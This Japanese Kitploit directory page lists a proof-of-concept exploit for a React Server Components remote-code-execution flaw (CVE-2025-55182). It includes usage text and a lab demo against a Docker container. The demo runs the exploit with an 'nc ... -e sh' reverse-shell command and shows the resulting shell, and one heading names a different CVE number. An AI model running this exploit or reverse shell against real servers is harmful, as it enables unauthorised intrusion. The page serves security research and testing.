Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
PoC-CVE-2025-55182 — CVE-2025-55182 (React2Shell) PoC: React 19.x および Next.js < 15.1.4 に影響を与える未認証RCE。RSC Flightプロトコルの脆弱性を悪用します。 | Kitploit
ツール/GitHubGitHub/masterwok/poc-cve-2025-55182
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubmasterwok/poc-cve-2025-55182

PoC-CVE-2025-55182

CVE-2025-55182 (React2Shell) PoC: React 19.x および Next.js < 15.1.4 に影響を与える未認証RCE。RSC Flightプロトコルの脆弱性を悪用します。

リポジトリを見る
4ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

PoC: CVE-2026-33017

React Server Components バージョン 19.0.0、19.1.0、19.1.1、および 19.2.0(react-server-dom-parcel、react-server-dom-turbopack、react-server-dom-webpack の各パッケージを含む)には、認証前のリモートコード実行の脆弱性が存在します。脆弱なコードは、Server Function エンドポイントへの HTTP リクエストからペイロードを安全でない方法でデシリアライズします。

https://nvd.nist.gov/vuln/detail/CVE-2025-55182


使用方法

root@kitploit:~
usage: CVE-2025-55182.py [-h] --command COMMAND target

PoC exploit: CVE-2025-55182

positional arguments:
  target             Target hostname

options:
  -h, --help         show this help message and exit
  --command COMMAND  Command to run on target

実行例

root@kitploit:~
# Create docker instance
docker run -d -p 3000:3000 ihsansencan/react2shell:cve-2025-55182

# Start listener
nc -lnvp 4444

# Launch exploit
python3 CVE-2025-55182.py http://127.0.0.1:3000/ --command "nc 192.168.1.211  4444 -e sh"

# Should receive reverse shell in listener
Listening on 0.0.0.0 4444
Connection received on 172.17.0.2 43911
uname -a
Linux f346806b6f59 6.17.0-20-generic #20~24.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Mar 19 01:28:37 UTC 2 x86_64 Linux

このプロジェクトは教育および研究目的でのみ提供されています。 作者は、本コードの悪用または本コードによって引き起こされた損害について責任を負いません。

ツールをダウンロード